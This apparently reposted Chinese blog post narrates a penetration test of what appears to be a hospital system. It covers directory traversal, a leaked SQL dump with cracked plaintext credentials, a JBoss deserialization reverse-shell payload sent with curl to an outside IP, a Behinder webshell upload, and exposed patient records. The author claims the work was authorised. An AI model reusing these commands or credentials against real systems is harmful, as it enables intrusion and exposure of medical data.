记一次渗透实战

admin 2021年5月6日18:29:40评论55 views字数 1367阅读4分33秒阅读模式

目标:http://xxx.xx.xxx.xx:9002/zxxxxxg/bxm/login.php

访问目标:

记一次渗透实战

完事不慌burp抓包 ,查看响应包

记一次渗透实战

尝试枚举跑中国人名字典爆破无果

记一次渗透实战

常规操作 ,对目标目录进行删减 ,发现了目录遍历的漏洞

http://xxx.xx.xxx.xx:9002/zxxxxxg/

记一次渗透实战

尝试能不能获取有用的信息 ,

随意点击,爆出路径,为后面上传webshell 做铺垫

记一次渗透实战

之后发现了数据库的文件

http://xxx.xxx.xxx.xx:9002/zxxxing/txb.2xxxx1x9.sql

发现了两个账号

记一次渗透实战

对密码进行解密

记一次渗透实战

记一次渗透实战

admin/12345678
coolfd/shj811004

获得两个账号 ,尝试登陆
发现两个账号不可用 ,可能是另外一个系统的吧

继续搞呗

找到一个网站
http://www.xxxxxxx.cc/index.html

试试有没有后台
http://www.xxxxxxx.cc/admin/login.php#

http://www.xxxxxx.com/

http://www.xxxxx.com/admin/login.php#

尝试登陆后台 ,发现coolfd账号可用

记一次渗透实战

登陆后台了

尝试找上传点

上传多次无果

/myxxxtor/atxxxhed/ixxge/20xx923/201xxx23xxx623_39094.jpg

多处

记一次渗透实战

没有写权限

记一次渗透实战

多处上传失败

只能搞ip

对目标ip进行端口扫描

记一次渗透实战

逐个访问,发现了jboss

http://xxx.xx.xxx.xx:9080/

想到jboss 反序列化漏洞

记一次渗透实战

在网上找了反序列化的exp

将payload生成好了,直接使用

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 182.92.. 7777

监听端口

记一次渗透实战

curl http://xxx.xx.xxx.xx:9080/inxxker/rxxoxxnly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

向目标路径 /inxxker/rxxoxxnly

记一次渗透实战

即可拿到目标的最高权限

找到网站路径

发现了PHPinfo探针

http://xxx.xxx.xxx.xx:9002/phpinfo.php

记一次渗透实战

好像无法使用下载命令

Curl wget

只能用打包好的工具上传webshell了
6哥工具执行好像乱码了

记一次渗透实战

只好上传冰蝎木马上去
知道路径 直接上传

记一次渗透实战

为了便于管理,上传一个webshell

记一次渗透实战

在文件管理看到了数据库文件

记一次渗透实战

发现了账号和密码

记一次渗透实战

解密成功,后台登陆成功

记一次渗透实战

看起来是医院的系统

记一次渗透实战

个人病例信息大量泄露

记一次渗透实战

http://xxx.xx.xxx.xx:9002/zxxxxng/rxxg/35735xxxxx94369773.jpg

部分报告单泄露

为了安全起见,将木马已经删除了

似乎存在域环境

可惜自己菜 ,未敢深入

记一次渗透实战

记一次渗透实战

到这里就结束了,授权项目,如有打码不规范,请勿私自渗透,违者后果自负

相关推荐: Wordpress 插件命令执行

环境搭建 利用 phpstudy 搭建 wordpress ,http://wordpress.test/wp-admin/plugin-install.php 将解压一次后的漏洞插件压缩包上传并启用插件。 File Manager插件6.0版本 漏洞利用 这…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月6日18:29:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次渗透实战https://cn-sec.com/archives/246543.html